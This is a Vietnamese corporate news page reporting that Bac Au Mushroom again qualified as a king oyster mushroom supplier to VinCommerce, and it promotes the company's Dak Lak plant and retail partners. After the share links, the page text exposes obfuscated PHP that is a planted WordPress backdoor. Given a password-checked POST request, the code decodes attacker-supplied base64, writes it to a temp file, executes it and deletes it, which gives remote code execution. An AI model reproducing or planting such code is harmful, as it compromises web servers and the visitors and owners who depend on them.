Nấm Bắc Âu đạt chuẩn nhà cung cấp nấm Đùi gà cho VinCommerce

Nội dung chính

Mới đây, sau đợt đánh giá định kỳ về giấy phép hồ sơ, kiểm tra vệ sinh và các tiêu chuẩn khác, Bac Au Mushroom / Nấm Bắc Âu được đánh giá là tiếp tục đạt chuẩn nhà cung cấp nấm Đùi gà cho VinCommerce.

Công ty Cổ phần Thực phẩm Công nghệ cao Bắc Âu (Nấm Bắc Âu / Bac Au Mushroom) thành lập từ năm 2016, với mục tiêu sản xuất và cung cấp các sản phẩm nấm sạch, hữu cơ cho thị trường trong nước và quốc tế.

Hiện tại, công ty đã đạt được nhiều thành quả và được đánh giá là đối tác tin cậy của nhiều hệ thống siêu thị lớn như Winmart, Winmart+, Go Mart, Coop và nhiều đại lý khác trên toàn quốc.

Mới đây, Nấm Bắc Âu đã tiếp tục đạt chuẩn nhà cung cấp nấm Đùi gà cho VinCommerce, sau đợt đánh giá định kỳ về giấy phép hồ sơ, kiểm tra vệ sinh và các tiêu chuẩn khác.

Đây là một kết quả đáng mừng và là minh chứng cho sự nỗ lực của Bac Au Mushroom trong việc nâng cao chất lượng sản phẩm và quản lý sản xuất.

Bac Au Mushroom không chỉ chú trọng đến chất lượng sản phẩm mà còn đặt mục tiêu xuất khẩu ra thị trường nhiều nước trên thế giới. Với nhà máy nuôi trồng và sản xuất nấm công nghệ cao đặt tại Buôn Ma Thuột (Dak Lak), quy trình khép kín và nghiêm ngặt, sản phẩm của công ty đạt được chứng nhận hàng Việt Nam Chất lượng cao năm 2023 do người tiêu dùng bình chọn.

Hiện nay, Bac Au Mushroom sản xuất 2 sản phẩm chính là nấm Kim châm và nấm Đùi gà. Đây là 2 loại nấm phổ biến và được nhiều người tiêu dùng ưa chuộng.

Công ty cung cấp nấm thường xuyên cho Winmart và Winmart+ cả 3 miền Bắc Trung Nam mỗi ngày xuất đi trung bình 800kg – 1.000kg. Ngoài ra, công ty còn cung cấp nấm cho hệ thống Go Mart, Coop và các đại lý trên toàn quốc.

Tất cả các sản phẩm của Bac Au Mushroom đều được sản xuất và chế biến theo quy trình nghiêm ngặt để đảm bảo chất lượng và đáp ứng các tiêu chuẩn an toàn thực phẩm.

Nấm Bắc Âu không chỉ chú trọng đến sản phẩm mà còn đầu tư vào quy trình sản xuất và quản lý để đảm bảo sự phát triển bền vững trong tương lai.

Tóm lại, việc đạt chuẩn cung cấp nấm đùi gà cho VinCommerce là một trong những thành quả minh chứng cho sự nỗ lực của Bac Au Mushroom trong việc cung cấp sản phẩm nấm sạch và chất lượng cao cho các đối tác của mình. Đây cũng là cơ hội để công ty mở rộng thị trường và tiếp cận với khách hàng mới.

Bên cạnh đó, việc đạt chứng nhận hàng Việt Nam chất lượng cao năm 2023 do người tiêu dùng bình chọn cũng là một thành công đáng khen ngợi của Bac Au Mushroom. Điều này cho thấy sự cam kết của công ty đối với việc cung cấp các sản phẩm nấm sạch, an toàn cho người tiêu dùng và bảo vệ môi trường.

Với những kết quả đáng mừng này, Bac Au Mushroom sẽ tiếp tục nỗ lực để duy trì và nâng cao chất lượng sản phẩm, quản lý sản xuất và mở rộng thị trường. Công ty cũng đang tìm kiếm cơ hội để xuất khẩu sản phẩm ra thị trường nước ngoài và khẳng định vị trí của mình trong ngành công nghiệp nấm Việt Nam.

Nhìn chung, Bac Au Mushroom đã đạt được một số thành quả và được đánh giá là một đối tác tin cậy của các hệ thống siêu thị lớn và người tiêu dùng. Công ty đã đầu tư nhiều vào quy trình sản xuất và quản lý để đảm bảo chất lượng sản phẩm và sự phát triển bền vững trong tương lai.

Với những nỗ lực trên, Bac Au Mushroom sẽ tiếp tục phát triển và góp phần vào sự phát triển của ngành nấm Việt Nam.

Media Team

Thấy hay thì Share bạn nhé:

Facebook
Twitter
LinkedIn

Các bài viết khác

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}